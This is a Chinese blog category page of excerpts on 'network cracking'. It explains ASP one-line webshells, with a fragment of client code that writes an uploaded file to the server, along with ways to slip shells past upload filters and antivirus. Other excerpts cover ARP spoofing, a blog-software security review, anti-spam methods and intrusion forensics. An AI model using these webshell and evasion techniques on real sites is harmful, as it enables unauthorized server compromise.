木子屋 Dnawo's BLOG

分类:网络破解

共 44 篇

从蓝屏最小的asp木马来看C/S木马技术

这几天狂补asp,昨天休息,无聊就把自己的东西总结了一下,突然想到了我们经常使用的C/S型的webshell, 于是乎就胡乱分析了一下!呵呵! 众所周知,蓝屏的最小的asp木马,服务端仅一句话: 可以说是C/S型木马的极品!再看客户端: set lP=server.createObject("Adodb.Stream") lP.Open lP.Type=2 lP.CharSet="gb2312" lP.writetext request("p") lP.SaveToFile server.mappath("Neeao.asp"),2 lP.Close set lP=nothing response.redirect "Neeao.asp"…

asp一句话木马的原理

先讲一下原理: "一句话木马"服务端 就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 其中value可以自己修改 "一句话木马"客户端 用来向服务端提交控制数据的,提交的数据通过服务端构成完整的asp功能语句并执行,也就是生成我们所需要的asp木马文件 一句话木马客户端源文件: 里面涉及到一些脚本知识,我就只讲解一下功能和简单注释,不详细讲了,大家只要注意几个注意点就行了 ***********************************************************…

修改asp代码防止被杀毒软件误删

  某些杀毒软件会把正常的asp文件误认为是asp木马文件,而自动删除,影响正常使用。   下面方法可能会有效避免被杀毒软件删除   把   改成   如果杀毒软件认为是病毒的关键字符串是一个对象的方法或属性   如   把   改成

当碰到不能使用asp标记的时候

以前好多朋友说过就是在程序上传shell过程中,程序不允许包含标记符号的内容的文件上传,这样就有好多shell不能上传上去了!那我们是不就没别的方法了么,当然有了!呵呵! 我们拿蓝屏最小的ASP代码来看下: 我们来把他的标签换下来: 呵呵!这样就避开了使用,保存为.asp,程序照样执行,效果一样的说!

智能ABC漏洞

关于智能ABC漏洞利用的文章网上很多,很久没用现在都忘了是怎么一回事了, 又搜索了一次现将使用方法贴出来以备日后查询: 任何一个程序,只要有输入部分,就能调出智能ABC ! 输入V,再按一下↑或←(将光标移到v前),再按一下DEL键(删除v),之后按空格或者回车 该程序立即被杀死!

关于"木子屋"中毒解释

前阵子木子屋中毒,打开时全是乱码,本地机子似乎也同时中毒了,查看源文件被多加了句代码(如上图示),一经发现后马上停止了站点的运行,连上FTP将文件全部下载回来,搜索了全部页面和数据库却都没找到,便怀疑是服务器中了熊猫烧香,上次机子中熊猫烧香后它也是在网页中加类似的代码,联系客服他们却说是网站编码的问题(汗!)。我截了张图让他们好好再检查下服务器便下班了。第二天一上班打开木子屋好像没什么问题了,但发觉他们只是将上周的备份还原了下而已,然而不久访问时问题仍是依旧,再次向客服反映,这次等待了许久,最终问题是解决了,但我最终也没明白是怎么回事。 今天上蓝色论坛时看到"你的网站还好吗?遭遇ARP欺骗,怎么办?"才知道原来是服务器中了ARP欺骗木马病毒,应该是服务器所在机房的某台机器做了ARP欺骗了,在所有流经网关的网页前面都加了数据包。怪不得我会搜索不到,怪不得病毒会有时有有时没有。

PJBlog安全性分析

信息来源: 网安中国 (bbs.nschina.com) Author:lake2,http://lake2.0x54.org Date:2006-1-1 PJBlog2是PuterJam开发的一款免费的ASP + Access的个人blog系统,这几天偶想弄个blog来玩玩,经过比较选中了功能、界面都相对较好的PJBlog2。经过试用,感觉这blog还不错,也发现几个安全方面的小问题,就把我的一点点见解发出来。我分析的版本是05年12月11日发布的PJBlog2 v2.4.1211版本。 一、 密码加密算法 PJBlog2没有采用常用的MD5算法对用户密码加密,而是使用的SHA1算法。SHA1算法跟MD5类似,也是单向散列函数,不过它对任意长度的数据进行处理输出160位的数值。…

反垃圾邮件技术解析

(v1.0) Written By: Refdom Email: refdom@xfocus.org Date: 2004-3-20 Update:2005-8-27 声明:安全焦点(xfocus security team)是非商业,全方位的网络安全组织,本文档为安全焦点发布的技术文件,供自由技术传播,拒绝商业使用。文档的所有权归属安全焦点,任何使用文档中所介绍技术者对其后果自行负责,安全焦点以及本文档作者不对其承担任何责任。 目录 1 概述 3 1.1 什么是垃圾邮件? 3 1.2 安全问题 4 2 反垃圾邮件技术 4 2.1 过滤 5 2.1.1 关键词过滤 5 2.1.2 黑白名单 5…

收集入侵Windows系统的证据

随着网络的不断扩大,网络安全更加会成为人们的一个焦点,同时也成为是否能进一步投入到更深更广领域的一个基石。当然网络的安全也是一个动态的概念,世界上没有绝对安全的网络,只有相对安全的网络。相对安全环境的取得可以通过不断地完善系统程序(及时给系统漏洞打上不同的补丁和给系统升级)、装上防火墙,同时对那些胆敢在网络上破坏秩序做出不义行为的人给予恰如其分的处理。这必然要牵涉到证据的收集,本文正是对这一方面的内容针对Windows系统进行研究。 一、Windows系统特性 Windows操作系统维护三个相互独立的日志文件:系统日志、应用程序日志、安全日志。 1.系统日志 系统日志记录系统进程和设备驱动程序的活动。它审核的系统事件包括启动失败的设备驱动程序、硬件错误、重复的IP地址,以及服务的启动、暂停和停止。系统日志包含由系统组件记录的事情。例如在系统日志中记录启动期间要加载的驱动程序或其他系统组件的故障。由系统组件记录的事件类型是预先确定的。系统日志还包括了系统组件出现的问题,比如启动时某个驱动程序加载失败等。…

WEB漏洞挖掘技术

前言 漏洞挖掘技术一直是网络攻击者最感兴趣的问题,漏洞挖掘的范围也在随着技术的提升而有所变化.在前期针对缓冲区溢出 格式化字符串 堆溢出 lib库溢出等技术都是针对ELF文件(Linux可执行文件)或者PE文件(Win可执行文件)的漏洞挖掘技术. 在针对ELF文件 PE文件(*.exe与*.dll)的漏洞挖掘过程中,出现了很多的漏洞挖掘技术,但是针对PE文件 ELF文件的漏洞挖掘始终停留在了黑盒测试(包括单元黑盒测试)源代码审计等办法.通过RATS等源代码审计软件可以找到部分源代码级别的漏洞信息,但是毕竟源代码审计软件寻找的多数为strcpy memcpy等存在缓冲区溢出遗患的C函数,所以通过审计源代码的办法来进行漏洞挖掘是一个可能性系数很小的漏洞挖掘技术,而针对软件的黑盒子测试虽然也能找到一些软件的漏洞,但可能性系数也会较小,在国外的一些进行漏洞挖掘的办法已经慢慢的提升为自己写黑盒子测试代码,然后针对系统或软件的某个功能模块进行模块化的漏洞挖掘技术.例如Linux内核的很多漏洞都是通过fuzzing技术找到的,fuzzing即模糊测试的意思,大家可以理解为类似SQL盲注入类型的攻击技术.…